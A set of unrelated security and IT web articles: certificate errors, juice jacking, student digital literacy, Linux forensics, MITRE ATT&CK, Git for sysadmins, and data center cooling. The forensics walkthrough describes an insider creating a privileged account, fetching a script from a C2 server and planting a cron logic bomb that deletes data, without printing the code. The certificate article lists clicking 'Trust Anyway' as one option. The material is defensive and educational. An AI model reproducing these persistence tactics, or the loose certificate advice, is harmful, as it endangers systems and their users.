Formerly, the majority of data was structured and organized in database tables. Yet, as the world has gone digital with the emergence of the Internet, almost all information has been translated into strings of ones and zeros, ready to be stored, processed, evaluated and analyzed. | <urn:uuid:522ef167-73d3-4dcc-88e3-6c8f85f7c84a> | CC-MAIN-2024-38 | https://www.exasol.com/resource/turning-data-into-value-2/ | 2024-09-12T11:45:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651457.35/warc/CC-MAIN-20240912110742-20240912140742-00241.warc.gz | en | 0.943525 | 302 | 2.546875 | 3 |
X Ways To Resolve Untrusted Server Certificate Error
An untrusted Server Certificate error is usually triggered when there is some anomaly identified in the way a website or an application handles your data. This commonly happens when your home or enterprise network is not configured properly.
In today’s environment where work from home is becoming more common, WiFi or VPN connections also tend to cause this error. There is, however, a chance that it is an attempt by hackers to initiate a man-in-the-middle attack. To mitigate that risk, it’s important that we understand the basics of what a server certificate is, as well as some of the common security errors of untrusted server certificates and how to solve them.
What is a Server Certificate
Server certificates, also known as SSL certificates, are certificates that are used to verify the identity of a server for anyone who is trying to access it. The two most widely used types of server certificates are a RADIUS server certificate and a web server certificate.
An SSL certificate, when installed on a website, converts the protocol on the website to HTTPS from HTTP, an indicator that guarantees the authenticity of the website. Additionally, it also helps in encryption, thus keeping the information secure from potential hackers. The common name (CN) on RADIUS server certificates assures the connecting device that they are connected to the right server.
In this article, we will focus on the security error for server certificates and their fixes.
Security Warning: Untrusted Server Certificate
“Your connection is not private. Attackers might be trying to steal your personal or financial information from website/applicationname. This server could not prove that it is website/applicationname.”
This is an example of a message that will display when there is a security warning for an untrusted server certificate. The error message will contain additional details regarding the error message like-
- Failed revocation check,
- Untrusted certificate authority (CA)
- Invalid certificate or associated chain
- The name on the certificate is incorrect
This information can help you understand the root cause and to resolve the error. The steps to check this information are as follows.
How to Check Untrusted Server Certificate Errors
There are two steps to determine the type of the error message in order to understand how to fix it. To explain these steps, we take the example error “Untrusted server certificate error due to CN being incorrect.”
- Click on “advanced” and you get a detailed message about the error. For example, “This server could not prove that it is www.rightserver.com. Its security certificate is from www.right-server.com. This may be caused by a misconfiguration or an attack intercepting your connection.”
- Click on the padlock>Details>View Certificate to get details on the certificate like the CN that is assigned to the certificate. Online SSL checkers will give you information on what is wrong with the certificate. It will have the message-” None of the common names in the certificate match the name that was entered (www.rightserver.com). You may receive an error when accessing this site in a web browser. Learn more about name mismatch errors.
Types of Error Messages of Untrusted Server Certificate Errors
Name Mismatch Error
A name mismatch error means the CN (Common Name is provided as input to indicate the domain name of the server that you are hosting) or the domain name in the certificate does not match the address on the address bar of the browser.
For example, if a certificate has the common name www.right-server.com and the domain name that you are trying to access is www.rightserver.com then the error that you get is a name mismatch error.
SSL Certificate Not Trusted Error
This usually means that the domain name in the certificate is not a match to the URL typed in the browser. This error could be triggered by simple factors for example your certificate is registered for www.examplesite.com and you typed https://examplesite.com.
Expired Certificate Error
This error could pop up primarily because of two reasons, the system date, time, month, or year does not match the expiry date on the certificate or the certificate has expired. Issuing a certificate and forgetting to renew it before it is due to expire is a pretty common mistake with self-managed certificates.
Certificate Revoked Error
This error could mean your certificate has been rocked by your certificate CA or a wrong key was issued. This could also be because the website acquired the certificate using false credentials either in error or intentionally. It is always safe to check with your CA when you get this error message.
How to Fix Untrusted Server Certificate Errors
Once you determine the details of the error, there are two primary ways you can apply to fix the issue.
Check for Time-Misalignment
Oftentimes, certificate issues are due to time misalignment. When the time and date of your machine are different than what the system expects, the certificate will show an error. This may happen if your machine is set up to use a Network Time Protocol (NTP) Server that is local and you are trying to access the network from your home using a WiFi connection. Most machines nowadays are configured with a widely used NTP and you may face an issue with them because of a change in the time zone if you are traveling.
You can try to fix this problem by changing the time and date settings, then rebooting your system before trying to access your network.
To change the time and date settings for Windows machine or Google Chrome, follow the below steps:
- Right-click on the “Time & Date” that is on the bottom left section of the taskbar in your machine.
- Turn off the “Set time automatically” & “Set time zone automatically” options.
- Click the “Change” option under “Change date & time” to select the correct time, date, month, and year.
- Open “Services” from the search menu bar.
- Go to “Windows Time” and select the option “Automatic” from the drop-down for the option “Start-up Type” in the “General” section.
- Click ‘Start” under ‘Service Status” click on “OK” and then “Apply”
- Right-click on Windows Time and Start/Restart the Service. Once it is complete, reboot your computer to see if the error is fixed.
If the issue occurs when the machine has the correct time, it may be because of the network security infrastructure. In that case, try this next solution:
Resolve Untrusted Certificate
If the first step of checking and correcting the system time is not helpful, and you are trying to connect to an enterprise network, you will need to contact your IT administrator to resolve the issue. Depending upon the network infrastructure policies of your company, here are a few options your IT admins opt to resolve untrusted certificates.
- Procure and install a signed and trusted certificate. They would then apply this on your devices to resolve the untrusted server certificates.
- If the certificates are self-managed by your company’s IT, then they will try to fix the error by editing the certificate attributes.
- They may ask you to click “Trust Anyway” and continue connecting to the application or website.
Eliminate Untrusted Server Certificate Errors with SecureW2
Certificates are undoubtedly the most secure way to authenticate a user to an application, a website, or a network. For them to be an effective mechanism for network security, they require a not insignificant amount of infrastructure on the backend. Setting up a robust Public Key Infrastructure (PKI) requires detailed planning and in-depth knowledge which could be difficult without prior experience. Distributing those certificates to devices, managed or BYOD can be nearly impossible to scale without an onboarding solution.
SecureW2 offers simplified and easy-to-implement solutions that make the entire certificate lifecycle management process seamless. Our JoinNow MultiOS solutions are most trusted by our customers. SecureW2 solutions automate the entire process of certificate configuration and eliminate the need for a configuration guide. Talk to our industry experts to know more about our solutions. | <urn:uuid:3cb555e2-347b-4787-af9d-da31430f3f8e> | CC-MAIN-2024-38 | https://www.cloudradius.com/solved-security-error-untrusted-server-certificate/ | 2024-09-13T17:32:44Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00141.warc.gz | en | 0.903982 | 1,754 | 2.6875 | 3 |
Let’s tell you about a cyber attack that will leave you spellbound when you learn how it happens!
As you take a business trip, you wouldn’t worry about the safety of the data on your device because it is secured with stringent IT controls. However, at some point, you discover that the data on your phone is breached! How did this happen? Despite implementing strict IT controls and following the BYOD best practices?
Well, the data was breached when you decided to charge your device at a public charging station. You connected your device to a public USB port and there! Data was stolen as your device was kept for charging. In cyberspace, this is known as Juice Jacking attack.
What is Juice Jacking?
We know the utility of charging cables. They double up as a charger as well as a device to transfer data. Cybercriminals, however, take advantage of this functionality.
The charging cables available at public charging stations are loaded with malware. As soon as the device is plugged in, the device is infected with malware allowing the cyber attacker to easily access the device and expose vital business information, database, and credentials.
So, what are the ways to prevent Juice Jacking? We have some useful tips listed below.
The best practices to prevent Juice Jacking:
#1 Charge your devices
It is an ideal practice to charge your mobile devices before you leave for work. Charge your devices at home or office where you know there is security and no risk of Juice Jacking. It is advisable to keep your phones topped up or you may have to charge your phones in a location where USBs and charging ports may freely be available but there may be a great security risk.
#2 Adopt BYOC (Bring your own charger) policy
Companies today have embraced the BYOD (Bring your own device) culture. It’s about time they go one step ahead and ask the employees to bring their own chargers along with their devices. Employees who travel frequently and have the habit of charging their phones at public charging stations should be encouraged and reminded of carrying their own charges which they know for sure are secure and free of malware.
#3 Keep your device locked
In the best interest of securing the vital data and information available on the device, it is a good practice to keep your devices locked by patterns, numbers, or biometrics. Say, you don’t have enough charge on your device and have to connect to an unknown charging port, now even if your device is subject to Juice Jacking, the attacker will not be able to possess the information from a locked device. Avoid unlocking or leaving your unlocked phone unattended at the charging station.
#4 Use charge-only cables
Tech-giants have designed USB cables that are meant for charging purposes only. Such chargers do not have additional pins or wires for data transmission. It has only 2 points required to charge up the device. So, it is a good practice to use the charge-only cables. You will be spared of the Juice Jacking attack and its repercussions even if you charge the devices at a public charging station.
#5 Educate your employees
The best practice of all- training and educating the employees about Juice Jacking, how it takes place and encouraging them to follow the practices mentioned above. Today, cyberattacks have become sophisticated and cyberattacks such as Juice Jacking are unheard of. So, it is important to educate the employees to successfully combat the same.
Finally, as we enjoy the benefits of digitalization, we never know when we may subject to a cyberattack like Juice Jacking.
You may not even realize that a common act of charging your phone at the public charging stations may potentially be a major cyber threat.
Be precautious before you plug it in! | <urn:uuid:9f987242-9c6c-41ef-b93d-759505a9b709> | CC-MAIN-2024-38 | https://www.ilantus.com/five-ways-to-prevent-juice-jacking/ | 2024-09-13T18:16:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00141.warc.gz | en | 0.96228 | 784 | 2.53125 | 3 |
By Michael Webb, chief technology officer, Identity Automation.
With the rise of online curriculums and virtual learning in both K-12 and higher ed institutions, there has been a notable increase in technology dependance. This dependency on digital tools has not only exposed children to challenges related to cyberbullying, plagiarism and online safety, but it has also made school districts incredibly vulnerable to increased cyberattacks.
Risk abounds year-round and according to hackers, student data is among the most valuable information in their sphere. They are aware that students are using personal and financial data for the first time, and find it easy to exploit their lack of awareness in safeguarding their digital identities.
Countering such attacks with the proper resources and tools can be especially difficult if there is little to no room in the IT budget for enhanced cybersecurity efforts. According to a recent report released by the Center for Internet Security, approximately one in five K-12 organizations dedicate less than 1% of their budget to cybersecurity.
While technology continues to create endless opportunities for learning, the seemingly alarming lack of cyber defenses compounds the allurement to sophisticated cybercriminals. As a result, the ever-growing data security challenge requires an effective approach to cybersecurity that first involves the development of responsible, appropriate and empowered use of technology through enhanced digital literacy.
Digital literacy starts with enhancing effective cyber skills through online awareness, (password safety, digital identity, phishing) and empowering students to protect their safety and privacy as much as possible. ISTE, the International Society for Technology in Education, defines digital literacy as including “the knowledge of and the ability to use digital technologies to locate, evaluate, synthesize, create, and communicate information. Being digitally literate includes having an understanding of the human and technological complexities of a digital media landscape. A student-friendly definition of digital literacy is using technology to explore, connect, create, and learn.” | <urn:uuid:33bdc916-febd-4126-95e1-98f23976d13c> | CC-MAIN-2024-38 | https://educationitreporter.com/tag/digital-security/ | 2024-09-15T00:49:56Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00041.warc.gz | en | 0.952004 | 391 | 3.3125 | 3 |
Hello Friend 🙂
In this part, we’re going to learn about the methodology that’s used in the Forensic investigation of Linux Machines.
Prerequisite: Basic knowledge of Linux OS & Command Line Skills
But first, let’s understand:
What is Digital forensics?
Digital forensics is the process of collecting, analyzing, and preserving digital evidence in a manner that is admissible in a court of law. It involves the investigation of electronic devices and digital storage media to obtain evidence related to a cybercrime, intellectual property theft, or other illegal activity.
Steps in Digital Forensic
- Identifying and preserving digital evidence
- Analyzing the data
- Presenting findings in a clear and concise manner.
Big Five Areas for Linux Forensics
[Processes] - Suspicious processes and network activity.
[Directories] - Suspicious directories holding malicious payloads, data, or tools to allow lateral movement into a network.
[Files] - Files that are malicious, likely tampered with, or otherwise out of place on a Linux host.
[Users] - Areas to check for suspicious user activity.
[Logs] - Log file tampering detection and common areas to check for signs someone has been covering their tracks.
How to Perform Investigating on Linux Machine
There’re many cheat sheets that you can find on the internet that helps you to check all the points where useful information can be found. Some are HERE & HERE.
Note: There’s not that one Golden cheatsheet that you can use to solve every case there are always different kinds of Tactics & Techniques used by adversaries so we also have to use different Tactics & Techniques during an investigation.
Here is my Methalogy (Cheatsheet) which I use during the initial investigation phase.
Case Stories: One of the company’s IT employees has been fired some weeks ago. Today the SOC Analyst notices that some activity was done using that employee’s SSH credentials (Sysadmin forgets to remove that employee’s account from the server) on one of our Main company’s servers so SOC immediately calls us to investigate that Linux server to find what that employee has done.
We’ve login via SSH on that server’s root credentials & go straight at logs Monitoring. Luckily the adversary didn’t delete them (even if he did we’ve backups on another system:/)
First, we check the auth.log (as it contains all activities/Events perform on the whole system via a user)
Ok, so A/C to logs Cybert (former employee’s account) has used sudo (Root Privilege) to create a new user “it-admin”.
Bottom of the logs we can see that he opens visudo (sudoers file editor) with sudo (Root Privilege). Maybe he had added his new account to the sudo policy list so that account can run ALL commands with Root privilege. (maybe a little persistence step he did)
He then switches to that new user (it-admin) from cybert.
After that, he ran a script (bomb.sh) using vi (if he used vi then vi also had created a log. Let’s look at that later) with it-admin & surprisingly he (cybert) then deleted the it-admin accounts.
That’s strange why we created a high-privilege account & then deleted all of that so it confirms that he (cybert) doesn’t have any motive to remain persistent Access to the system.
Ok, Now let’s move logs to other points where we can find more information. Do you remember a .bash_history file?. Yes, it stores all the commands the user had run on its shell (terminal). Let’s check that of this new user (it-admin).
We’ve .viminfo also looks like he uses vi to edit something but first analyze .bash_history.
Hmm, the adversary did download some kind of malware from his C2 Server.
I’ve searched this script (bomb.sh) in the whole system but didn’t find it seems like attacker did something with it.
So let’s check that .viminfo to see the vi cache.
Ok, so he changed the script’s name to os-update.sh & save it to a more crowded directory (to make it less suspicious).
Check this malware/script code.
A/C to malware. It’s waiting for 90 days if the user “it-admin” (which the adversary deleted) didn’t login into the system. This script will then delete all data on /dokuwiki (which has our important conf, API keys, etc) & leave a revenge message.
Do you remember we see that a crontab was opened with nano so definitely this script is set as a job? Check /etc/crontab.
And yes it’ll run this script every day at 8:00 AM & that script will check 90 day inactivity from the it-admin condition. It’s basically a Logic Bomb that triggers when certain conditions are met.
Perfect, we Successfully handled this case. Now we can report authority & sysadmin so he can remove all this adversary malware, and accounts & revert the changes he did.
That’s it maybe Next we’ll cover Andriod Forensics
Check Blue Team Bootcamp’s previous parts HERE & HERE & HERE.
if want to support us with coffee then ping us on here
Question or any suggestion for a new Topic? Ping me on my socials | <urn:uuid:228f5190-312c-4dbf-9b26-52a81624026f> | CC-MAIN-2024-38 | https://hacklido.com/blog/403-blue-team-bootcamp-series-p4-linux-forensic-a-practical-approach-for-uncovering-digital-evidence | 2024-09-15T00:03:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00041.warc.gz | en | 0.920092 | 1,193 | 2.953125 | 3 |
The MITRE ATT&CK framework is a knowledge-based repository of adversary tactics and techniques based on real-world observations. It stands for MITRE Adversarial Tactics, Techniques, and Common Knowledge and provides a systematic way to categorize and describe the actions that adversaries take when compromising information systems.
This framework aids cybersecurity professionals in understanding how adversaries operate and in developing effective defense strategies. The framework is widely adopted across various industries and sectors due to its detailed, continuously updated, and practical approach to cybersecurity.
This is part of a series of articles about network attacks
The MITRE ATT&CK framework was developed by the MITRE Corporation, a not-for-profit organization that operates multiple federally funded research and development centers. It was created to provide a compendium of known attack tactics and techniques observed in real-world incidents.
Its development began in 2013 when MITRE started compiling detailed descriptions of adversary behaviors based on studies of real-world attacks. The framework was publicly released in 2015 and has been regularly updated since.
Initially intended to improve post-attack analysis and forensics, the framework has evolved to serve broader security needs including threat detection, analysis, and simulation. It includes the tactics, techniques, and procedures (TTPs) used by threat actors, helping organizations to better understand security threats and strengthen their defenses.
The MITRE ATT&CK framework and the Lockheed Martin Cyber Kill Chain model both provide methodologies for tracking and analyzing cyber attacks, but they differ in scope and detail.
The Cyber Kill Chain model outlines the stages of a cyber attack from initial reconnaissance to exfiltration of data. It comprises seven phases: reconnaissance, weaponization, delivery, exploitation, installation, command and control (C2), and actions on objectives.
MITRE ATT&CK covers a broader spectrum, including post-compromise techniques and lateral movement within a network. MITRE’s approach provides a more in-depth, technique-specific insight across different platforms and is continually updated to reflect evolving threats, making it more dynamic and adaptable for modern security professionals.
Tips From the Expert
In my experience, here are tips that can help you better utilize the MITRE ATT&CK framework:
The framework includes several matrices related to different security contexts.
The Enterprise Matrix covers techniques used by adversaries to compromise enterprise networks (the networks of commercial, government, or other entities). It categorizes techniques under various tactics which represent the different stages of an attack, such as initial access, execution, persistence, and exfiltration.
The Mobile Matrix addresses security threats to mobile environments, cataloging common adversary tactics and techniques affecting mobile platforms. It details how threat actors exploit vulnerabilities in mobile operating systems, apps, and services. Typical use cases include securing corporate mobile devices and developing secure mobile applications.
The Industrial Control Systems (ICS) Matrix focuses on techniques that affect industrial systems, commonly found in critical infrastructure sectors like energy, manufacturing, and transportation. It catalogs attack techniques that disrupt ICS operations, such as control process manipulation and ladder logic modification.
The MITRE ATT&CK framework is organized into matrices that outline different stages of an adversary’s attack lifecycle, known as tactics, and the specific methods they use, known as techniques.
Tactics represent the “why” of an attack technique. They are the adversary’s tactical goals during an attack, such as achieving initial access, maintaining persistence, or executing malicious code. Each tactic category includes a range of techniques that adversaries use to achieve these goals.
Examples of tactics include:
Techniques are the methods by which adversaries achieve their tactical goals. Each technique may be further broken down into sub-techniques, which provide more granular details on how an adversary accomplishes a particular method.
Examples of techniques include:
Obfuscated files or information (defense evasion): Using complex encoding or encryption to avoid detection.
The framework is useful for informing different aspects of an organization’s security strategy. It is commonly used for:
Red teaming: Simulates realistic cyber attacks based on known adversary behaviors. The framework’s detailing of attack techniques helps these teams in planning and executing operations that test organizational defenses.
MITRE Engenuity is a tech foundation launched by the MITRE Corporation to advance its public interest work through partnerships with the private sector, academia, and government. Its purpose is to foster innovation and collaboration on challenges that demand public good solutions, including cybersecurity and next-generation technology like artificial intelligence and quantum computing.
The foundation focuses on projects that extend the capabilities of the MITRE ATT&CK framework. Key projects and initiatives include:
Engenuity Open Generation 5G: Promotes the secure development and deployment of 5G technologies by creating open, adaptable frameworks and best practices for industry stakeholders.
Here’s an overview of how organizations can use MITRE ATT&CK.
The MITRE ATT&CK framework helps organizations build a comprehensive cybersecurity strategy. Mapping out potential attack paths and prioritizing defenses based on known methods allows teams to create a focused, effective security posture.
Strategies built around the framework are resilient, adaptable, and preemptive, anticipating attacks before they occur. This planning process is essential for maintaining the integrity and continuity of IT operations across all types of enterprises.
Adversary emulation involves simulating attacks to test defenses. Using the MITRE ATT&CK framework, organizations can map out scenarios that use known adversary tactics and techniques to challenge their security systems. This process helps identify weaknesses in defensive measures and drives improvements in incident response strategies.
Planning and executing such simulations provide critical insights into an organization’s readiness, enhancing overall cybersecurity health through continuous refinement and reassessment of tactics and controls.
The MITRE ATT&CK framework allows organizations to review and identify vulnerabilities in their security infrastructure by comparing existing defenses against known adversary behaviors. By understanding where gaps exist, security teams can prioritize the relevant improvements and implement more effective mitigations.
This gap analysis is important for strengthening defenses against targeted attacks and improving the overall security landscape of an organization.
Integrating threat intelligence with the MITRE ATT&CK framework improves an organization’s ability to anticipate and respond to threats. By aligning real-time intelligence about active threats with the framework’s structured data on adversary tactics and techniques, organizations can quickly adapt their security measures to address emerging threats.
This integration transforms reactive security postures into proactive defenses, significantly reducing the risk of successful cyber attacks and ensuring continuous security improvements.
Cynet emerged as a top performer in the 2023 MITRE ATT&CK Evaluation, achieving impressive results that placed it ahead of many other vendors in multiple crucial sectors.
Given the diverse threat landscape, cybersecurity solutions need to be agile, robust, and comprehensive. Cynet’s performance in the 2023 MITRE ATT&CK Evaluation is an affirmation of its capabilities and its commitment to providing advanced detection solutions for businesses and organizations.
Search results for: | <urn:uuid:994861b6-dfb0-4123-a23c-c168fea6f674> | CC-MAIN-2024-38 | https://www.cynet.com/network-attacks/quick-guide-to-mitre-attck-matrices-tactics-techniques-more/ | 2024-09-15T00:42:16Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00041.warc.gz | en | 0.929779 | 1,442 | 2.65625 | 3 |
Most people who know about Git think of it as a repository for software projects. It’s actually more than that. It’s valuable with any kind of files, especially text files, that get periodic updates. Git is a valuable resource not just for programmers, but for system administrators.
In addition to source code, a Git repository can hold configuration files, scripts, and text documentation.
Benefits to Sysadmins
Using a repository makes the administrator’s life easier in many ways.
- It keeps a history of changes, making it easier to fix problems. If a new version of a file breaks the system, getting the previous one back is easy. If something is misbehaving, comparing the latest version with the one before helps to isolate the problem.
- Tracking changes is a good discipline. Each newly committed version should include a brief comment explaining the reason for the change. Sometimes it’s necessary to go back several versions and figure out why a change was made.
- A shared repository makes it easier for people to collaborate. Git includes features to prevent inadvertent overwriting of one another’s work.
- Git supports branches. You can try something out in a private branch and merge it into the mainstream if it works.
- Configurations and scripts can become part of the DevOps cycle. They can undergo automated testing each time they’re committed, along with application code.
Only files which people work on should be in the repository. Ones which software creates from them, such as generated documentation and binary files, shouldn’t be. Git works best with plain text files, where it stores differences between one version and the next very efficiently. You can use it for images and binaries, but the repository could become huge over time. Whatever approach you choose, never put highly confidential information, such as passwords and keys, into a Git repository.
The whole history, including changes committed by others, is in your repository. You can see what changes others made, as well as your own.
A Quick Introduction to Git
Git is free, open-source software for creating and maintaining distributed file repositories. It’s the invention of Linus Torvalds, who is best known for creating Linux. The word “distributed” is important. Unlike older version control software, such as CVS and Subversion, each participant has a personal repository. People on a team make changes locally, then push them to the team’s central repository. This lets them work offline and not give changes to others until they’re ready.
The central repository can be public or private. GitHub is the biggest and best known, but it’s not mandatory. Anyone can create a repository on a server.
You can use Git from the command line or from a GUI client. The client can be standalone or part of a larger application. Many options are available.
Unless you’re working from an existing repository, the first step is to create one on your own machine. It will be associated with a directory where you do your work. You can add a public repository later after you’re sure it’s a worthwhile project. You should create a .gitignore file to indicate types of files that don’t belong there.
Add the Files You Need
Shot of a group of young people using computers during a late night in a modern office.
At first, it’s empty, and you have to add files to it. The way Git handles adding and committing files is different from most source control systems, and it confuses everyone at first. When you create a file, it doesn’t automatically go into the repository. Git uses a staging area between your working files and the repository. You first have to stage your files. Then, when you’re ready, you commit them.
When you’re ready to share the project, or if you just want the extra safety of a copy that isn’t on your machine, you can create a matching repository on the central Git server. You then add a connection from your repository to the remote one and push your current state to it. The changes to your own repository don’t automatically sync to the remote when you commit them; you have to push them. This lets you wait till you’re sure the changes are ready to share.
Other users can now clone the shared repository. Cloning creates a copy on their machines. They can then pull changes from it and see everything you’ve committed. They can commit their own changes and push them. You can also give some users read-only access, letting them clone and pull but not push.
Types of Repositories
There are many ways to set up a remote.
- GitHub and GitLab offer private repositories to paying customers.
- You can set up and run a Git server on your own machine or a virtual cloud-based machine.
- Cloud development services provide their own Git repositories, such as Azure Repos. It’s free for teams of up to five users and allows unlimited private repositories.
All implementations provide the same features, and you can move a Git repo from one place to another whenever you like.
Types of Clients
The choice of clients for Git is even bigger. The command line gives the full power of the software, but it’s complicated and takes some time to learn well. Any self-respecting administrator should be up to the challenge. For occasional use, though, there are alternatives which are easier to use.
Various GUI applications are available. Not all of them allow full access to all Git functionality. In addition, Git clients are often built into developer software. Emacs includes some Git support, but many people find that add-ons, such as Magit, allow easier use. IDEs often include a client.
For serious use, the command line is best. It provides all the functionality and doesn’t disguise any of the steps.
A Valuable Tool
Tracking changes is important in both program source files and administration-related files. The reasons are similar in both cases: better collaboration, ability to recover from mistakes, and access to a project’s history. The DevOps paradigm makes administrators part of the team that updates, tests, and releases projects, and it works best if everyone uses the same tools. Using Git lets administrators manage change better.
AgileDevOps removes silos between IT operations and development teams, bridging the gap from traditional infrastructure deployment process to modern cloud DevOps. To find out how we can help, request a free quote today.
Published on: . | <urn:uuid:a0e4a981-1461-4bfd-8616-19f7a58bb9df> | CC-MAIN-2024-38 | https://agileit.com/news/git-system-administrators/ | 2024-09-17T09:24:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00741.warc.gz | en | 0.926244 | 1,378 | 2.828125 | 3 |
The role of the data center is rapidly evolving. With our reliance on digital services growing, and the prospect of a future virtual world, this demand is not expected to slow down.
There’s already plenty of attention on the role that data centers will play. It’s no surprise then, that providers are recognising the wealth of opportunities, with cloud and colocation being forecasted by Omdia to grow at a five-year CAGR of 16.6 percent and 8.3 percent respectively.
At the same time, data center providers are embracing strict policies to drastically reduce their carbon emissions in order to help achieve sustainability targets.
Data center sustainability
Major data center operators have signed The Climate Neutral Data Center Pact, and many more are moving in the same direction; the industry has committed to climate neutrality by 2030, ensuring that sustainability is now a key element of any business process.
With this in mind, chilled-water systems are a viable way for data center providers to not only support their growth cost-effectively and with minimal disruption, but also reduce their carbon footprint and help meet sustainability objectives.
The reduction of emissions goes through two fundamental aspects: the reduction of direct emissions and the reduction of indirect emissions.
Reduction of the direct emissions (refrigerant GWP)
Global warming potential (GWP) describes the relative impact of a greenhouse gas, and the timespan that it remains active in the atmosphere, compared to a base of CO2. The lower this metric, the lower the atmospheric impact.
The traditional refrigerants can now be replaced by modern HFO (hydrofluoro-olefin) refrigerants, which have a lower GWP; it is expected that this will prevent the emissions of up to 105 million tons of equivalent CO2 by 2040.
However, most of these new refrigerants are classified by ASHRAE (American Society of Heating, Refrigerating and Air-Conditioning Engineers) as mildly flammable therefore requiring a new design for the cooling system, potentially impacting the broader data center design.
Chilled-water systems offer an excellent solution as the refrigerant is contained within chiller units and, in most applications, these are installed outside of the data center, thus simplifying the use of flammable fluids.
Chilled-water systems are one of the first cooling technologies to apply low GWP refrigerants in data center applications and therefore are an example of a valid alternative for reducing direct environmental impacts.
Reduction of the indirect emissions (cutting energy consumption)
Reducing carbon footprint also means cutting the electricity consumed by a data center during its operation. This is where chilled-water systems can play a big role. In recent years, they have applied a range of cooling system efficiency improvements that allow a reduction of electricity usage.
For example, in a chilled water system, the chiller compressor is the greatest consumer of electricity, and the warmer the external climate, the greater the electricity demand of the compressor.
Recently, there has been an increased use of inverter-driven compressors which help to achieve higher efficiency levels, especially at partial loads. Chillers equipped with inverter driven screw compressors, or oil-free centrifugal compressors, are now available to drastically cut down electricity consumption compared to the previous technology available.
Over the past few years, ASHRAE has increased the recommended operating temperature of data centers equipment up to 27°C. This has allowed subsequent increases to the water temperatures within chilled-water systems and has enabled an extended use of freecooling chillers, even in countries where freecooling was not previously feasible.
Freecooling technology has an important advantage as it allows for the cooling of the system without activation of the compressor.
The adiabatic technology can additionally improve the efficiency of a chilled-water system. In these systems, the ambient air is cooled down by passing through wet pads. The air is then delivered at a lower temperature, achieving a higher freecooling capacity of the chiller and a more efficient operation of the compressor.
The core of this solution is the onboard controller of the unit: it enables the use of water whenever strictly needed, according either to redundancy, efficiency or cooling demand needs.
The controller has the main responsibility in preventing water from being wasted, improving the WUE (water usage effectiveness) of the data center. The application of water is always a matter of balancing different aspects and constraints.
Further improvements to data center efficiency can be made through the optimisation of chilled-water systems controls. Chilled plant manager technology can coordinate the operation of all the units and main components of the chilled-water systems. It allows an integration and coordination of the working mode between units and the main components, enabling improved efficiencies and performance at partial loads or, in the unlikely event of failure, finding the best way to react and grant cooling continuity to the system.
Combining all the technology optimizations, chilled water systems can significantly reduce the direct and indirect emissions.
The following table summarises an example of the results in London, where the system never fully works in direct expansion mode, thus granting excellent system efficiency and reducing costs.
pPUE = partial power usage effectiveness (attributable to the cooling system)
WUE = Water Usage Effectiveness
TEWI = total equivalent warming impact
Scaling with confidence
An example of how chilled-water systems can achieve these benefits is in the case of Green Mountain, a Norwegian hydro-powered data center where the thermal management system plays a big role.
Green Mountain gained five megawatts of additional cooling capacity after the installation of Vertiv’s chilled water units, demonstrating how these systems, as part of a broader strategy, can facilitate carbon neutral data center configurations.
Many hyperscale and colocation providers are now embracing the opportunity chilled-water systems present, not only from a cost and speed of deployment perspective, but with sustainability front and center.
This needs to continue as we move into the next phase of the race for expanding capacity and improving the data center carbon footprint.
With such rapid expansion and increasing pressure to achieve net-zero, data center providers must rely on new technologies to meet the requirements of both today and tomorrow.
To learn more about chilled water systems and the benefits they bring to data center applications, download the free white paper, 'How chilled water systems meet data center availability and sustainability goals.'
More from Vertiv
Sponsored Sustainability conscious? Just chill
Evaluating the sustainability of chilled water systems
Sponsored Time for an upgrade
How new thermal services, upgrades and retrofits can optimize underperforming data centers and enable energy reduction goals
Liquid cooling has never been hotter (excuse the pun). We chatted with Drew Tuholski, Offering Manager at Vertiv about everything liquid cooling | <urn:uuid:1f01e6e0-1ab9-4b29-acea-dbb51a0f26c5> | CC-MAIN-2024-38 | https://direct.datacenterdynamics.com/en/opinions/a-chilled-approach-to-sustainability/ | 2024-09-17T07:55:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00741.warc.gz | en | 0.923167 | 1,397 | 2.8125 | 3 |
In today's digital age, data centers play a crucial role in supporting our ever-increasing demand for digital services. As the volume of data being processed and stored continues to grow exponentially, the need for efficient data center cooling becomes paramount.
In this article, we will explore the best practices for data center cooling, starting with an understanding of colocation and an overview of current cooling technologies.
Colocation refers to the practice of housing servers and other IT infrastructure in a shared facility rather than maintaining them in-house. This allows businesses to benefit from economies of scale and access to robust infrastructure without the substantial cost of building and maintaining their own data centers.
Colocation providers play a crucial role in the modern digital landscape by offering a comprehensive suite of services to businesses. Alongside providing physical space for housing servers and IT infrastructure, colocation providers also offer a range of vital services.
These include robust power solutions to ensure uninterrupted operation, efficient cooling systems to maintain optimal temperature levels, stringent security measures to safeguard valuable data, and reliable network connectivity to enable seamless communication and access to the internet.
By outsourcing these critical functions to colocation providers, businesses can focus on their core competencies while enjoying the benefits of a highly secure, scalable, and resilient IT environment.
Overview of Data Center Cooling Technologies
Data center power and cooling technologies have evolved significantly over the years. Traditional methods such as air conditioning units and raised floors are being replaced by more innovative and energy-efficient solutions. Here are some of the current state-of-the-art cooling technologies:
Hot Aisle/Cold Aisle Containment
This strategy involves segregating the server racks into designated hot aisles and cold aisles, ensuring that the hot exhaust air from servers does not mix with the cold supply air. By isolating the hot and cold air streams, this approach prevents the recirculation of hot air and maximizes the effectiveness of cooling systems.
As a result, cooling efficiency is significantly improved, resulting in reduced energy consumption and lower cooling costs. This approach is widely adopted in modern data centers to enhance their overall energy efficiency and reduce environmental impact.
New cooling systems have been created that are better than traditional air-based systems for computer equipment. Liquid cooling uses a coolant to take the heat away from the parts, instead of fans and heat sinks like air-based systems do.
Direct-to-chip cooling involves circulating liquid coolant through microchannels, optimizing heat transfer and dissipating it more efficiently. Immersion cooling, on the other hand, submerges the entire server or components in a non-conductive liquid coolant, allowing for even greater heat dissipation.
